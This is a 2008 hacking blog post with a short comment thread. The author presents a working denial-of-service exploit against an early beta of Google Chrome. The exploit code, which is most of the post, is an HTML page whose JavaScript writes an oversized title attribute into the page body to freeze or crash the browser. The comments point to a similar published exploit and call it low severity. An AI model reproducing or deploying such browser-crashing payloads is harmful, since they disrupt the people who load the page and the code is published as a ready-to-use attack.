Ready, set, chrome!
Posted on September 8, 2008
Filed Under Exploits, Hacking |
Google’s has lunched their new browser called Chrome in its very early BETA version(0.2.149.27)
and ofcourse everyone is on the race for 0day exploits. So far only few vulnerability has been found most of them are low severity exploits and non of them are a real use for massive 0wnage or somthing
so i thought i’ll give it a try and so far i’ve came up with another kinda useless exploit
i’ve found that Chrome is having a hard time rendering a oversized title attribute causing it to
- freeze under Vista SP1.
- crash in some cases under Windows XP SP1/SP2.
Exploit:
-
<!–
-
Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit
-
Exploit written by Exodus.
-
http://www.blackhat.org.il
-
http://www.blackhat.org.il/index.php/ready-set-chrome/
-
http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html
-
–>
-
<HTML>
-
<HEAD>
-
<TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE>
-
<SCRIPT language="JavaScript">
-
function buff(len)
-
{
-
var buffer;
-
for(var i = 0; i != len; i++)
-
{ buffer += 'E';}
-
return buffer;
-
}
-
</SCRIPT>
-
</HEAD>
-
<SCRIPT>
-
document.write('<body title=\”' + buff(31337) + '\”>');
-
</SCRIPT>
-
</BODY>
-
</HTML>
Comments
3 Responses to “Ready, set, chrome!”
Leave a Reply
[...] “Tool tip” DoS - September 8, 2008. Exodus of BlackHat Security (Israel) has discovered that a large object title can crash Chrome. This works on the current version of Chrome (0.2.149.29 [...]
Seen http://milw0rm.com/exploits/6367 ?
yes of course, and i consider it as a low severity too since you gotta save it in order
for the exploit to work